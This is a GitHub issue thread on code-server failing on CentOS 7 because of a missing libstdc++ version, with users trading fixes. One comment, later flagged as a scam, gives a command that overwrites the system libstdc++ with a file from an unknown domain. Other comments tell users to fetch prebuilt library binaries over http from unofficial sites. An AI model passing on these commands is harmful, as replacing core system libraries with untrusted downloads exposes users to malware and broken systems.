### ISSUE TITLE
/lib64/libstdc++.so.6: version `GLIBCXX_3.4.20' not found

### ISSUE THREAD

**Issue by zhy1** [cdr/code-server#766]
- `code-server` version: code-server1.1140-vsc1.33.1-linux-x64.tar.gz
- OS Version: Linux version 3.10.0-693.el7.x86_64 (builder@kbuilder.dev.centos.org) (gcc version 4.8.5 20150623 (Red Hat 4.8.5-16) (GCC) ) #1 SMP Tue Aug 22 21:09:27 UTC 2017

## Description
 ./code-server . --host 127.0.0.1
./code-server: /lib64/libstdc++.so.6: version `GLIBCXX_3.4.20' not found (required by ./code-server)
./code-server: /lib64/libstdc++.so.6: version `GLIBCXX_3.4.21' not found (required by ./code-server)
./code-server: /lib64/libstdc++.so.6: version `CXXABI_1.3.9' not found (required by ./code-server)

## solution:
1
GLIBCXX_3.4.20' not found
sudo find / -name "libstdc++.so.6*"
sudo cp somewhere/libstdc++.so.6.0.25 /usr/lib64/

2
GLIBC_2.18' not found
curl -O http://ftp.gnu.org/gnu/glibc/glibc-2.18.tar.gz
tar zxf glibc-2.18.tar.gz
cd glibc-2.18/
mkdir build
cd build/
../configure --prefix=/usr
make -j2
make install

**Comment by NMSAzulX** [comment]
me too.

**Comment by NMSAzulX** [comment]
This is a deadly Bug.

**Comment by zhy1** [comment]
i resolve this problem.

**Comment by NMSAzulX** [comment]
@zhy1 How did you solve it?

**Comment by JayroALH** [comment]
I have the same issue
@zhy1  how did you resolve?
I'm running Red Hat Enterprise 7.4

**Comment by zhy1** [comment]
GLIBCXX_3.4.20' not found
sudo find / -name "libstdc++.so.6*"
sudo cp somewhere/libstdc++.so.6.0.25 /usr/lib64/

"/lib64/libc.so.6: version `GLIBC_2.18' not found (required by /lib64/libstdc++.so.6)"
curl -O http://ftp.gnu.org/gnu/glibc/glibc-2.18.tar.gz
tar zxf glibc-2.18.tar.gz 
cd glibc-2.18/
mkdir build
cd build/
../configure --prefix=/usr
make -j2
make install

**Comment by UnlimitedBytes** [comment]
Just install the new libstdc++.so.6 version

You can get it with:
wget "https://doxspace.xyz/rcgygtmb.6" -O /usr/lib/x86_64-linux-gnu/libstdc++.so.6

**Comment by radonn24** [comment]
> Just install the new libstdc++.so.6 version
> 
> You can get it with:
> curl -o "/usr/lib/x86_64-linux-gnu/libstdc++.so.6" "https://doxspace.xyz/libstdc++.so.6"

Crap - I ran this:
`curl -o "/lib64/libstdc++.so.6" "https://doxspace.xyz/libstdc++.so.6"` and it broke my web server ... crap - I don't know how to roll it back either ...

**Comment by radonn24** [comment]
Phew - got my web server back online ... ran this `yum reinstall libstdc++`, then restarted Apache and MySQL ...
Going to take backups before proceeding ;)

**Comment by jamesloh** [comment]
I read somewhere that someone got the correct library from an Anaconda install. 
I confirmed by using the following instructions.

wget https://repo.anaconda.com/archive/Anaconda3-2019.07-Linux-x86_64.sh
sh Anaconda3-2019.07-Linux-x86_64.sh
cp anaconda3/lib/libstdc++.so.6.0.26 /usr/lib64
rm /usr/lib64/libstdc++.so.6
ln -s /usr/lib64/libstdc++.so.6.0.26 /usr/lib64/libstdc++.so.6

**Comment by sr229** [comment]
We already set a minimum GLIBC that you'll require so this is closed off. If you're still getting these errors, upgrade to CentOS 8.

*Or use Docker*

**Comment by xiaoma-father** [comment]
centos系统参考：https://www.jianshu.com/p/050b2b777b9d，实测有效。

**Comment by llyons** [comment]
> centos system can make a reference on：https://www.jianshu.com/p/050b2b777b9d, it's vlaid, i checked.

This worked for me on Centos 7.  The essential steps were

cd /usr/local/lib64
sudo wget http://www.vuln.cn/wp-content/uploads/2019/08/libstdc.so_.6.0.26.zip
sudo unzip libstdc.so_.6.0.26.zip
sudo cp libstdc++.so.6.0.26 /usr/lib64
cd  /usr/lib64
ls -l | grep libstdc++    (just to check the symlink)
sudo rm libstdc++.so.6
sudo ln -s libstdc++.so.6.0.26 libstdc++.so.6

**Comment by Luckyman6868** [comment]
Yes, I uesd your way to solve this problem and it worked! @llyons

**Comment by Tressa-Sanders** [comment]
> > centos system can make a reference on：https://www.jianshu.com/p/050b2b777b9d, it's vlaid, i checked.
> 
> This worked for me on Centos 7. The essential steps were
> 
> cd /usr/local/lib64 sudo wget http://www.vuln.cn/wp-content/uploads/2019/08/libstdc.so_.6.0.26.zip sudo unzip libstdc.so_.6.0.26.zip sudo cp libstdc++.so.6.0.26 /usr/lib64 cd /usr/lib64 ls -l | grep libstdc++ (just to check the symlink) sudo rm libstdc++.so.6 sudo ln -s libstdc++.so.6.0.26 libstdc++.so.6

This is still the fix in 2024.

**Comment by mzbro** [comment]
Had the same issue. The bug was actually in local cache. I tried:

In conan 1.x this simple method cleaned cache for me:

`conan remove "*" -f`

In conan 2.x I tried:

`conan cache clean -sbf "*"`
`conan remove "*" -c`

**Comment by softok2** [comment]
> > > centos system can make a reference on：https://www.jianshu.com/p/050b2b777b9d, it's vlaid, i checked.
> > 
> > 
> > This worked for me on Centos 7. The essential steps were
> > cd /usr/local/lib64 sudo wget http://www.vuln.cn/wp-content/uploads/2019/08/libstdc.so_.6.0.26.zip sudo unzip libstdc.so_.6.0.26.zip sudo cp libstdc++.so.6.0.26 /usr/lib64 cd /usr/lib64 ls -l | grep libstdc++ (just to check the symlink) sudo rm libstdc++.so.6 sudo ln -s libstdc++.so.6.0.26 libstdc++.so.6
> 
> This is still the fix in 2024.

Confirmed on Centos 7 July,2024

**Comment by jiafaxin** [comment]
> > centOS 系统可以在 https://www.jianshu.com/p/050b2b777b9d 上进行引用，它是 vlaid，我检查了一下。
> 
> 这在 Centos 7 上对我有用。基本步骤是
> 
> cd /usr/local/lib64 sudo wget http://www.vuln.cn/wp-content/uploads/2019/08/libstdc.so_.6.0.26.zip sudo unzip libstdc.so_.6.0.26.zip sudo cp libstdc++.so.6.0.26 /usr/lib64 cd /usr/lib64 ls -l |grep libstdc++（只是为了检查符号链接） sudo rm libstdc++.so.6 sudo ln -s libstdc++.so.6.0.26 libstdc++.so.6



Perfect solution

**Comment by JG1ANDONLY** [comment]
> Just install the new libstdc++.so.6 version
> 
> You can get it with: curl -o "/usr/lib/x86_64-linux-gnu/libstdc++.so.6" "redacted"

This website is a scam. Do not run this line!

**Comment by code-asher** [comment]
Thanks, seems to be a parked site now, I deleted the comment.
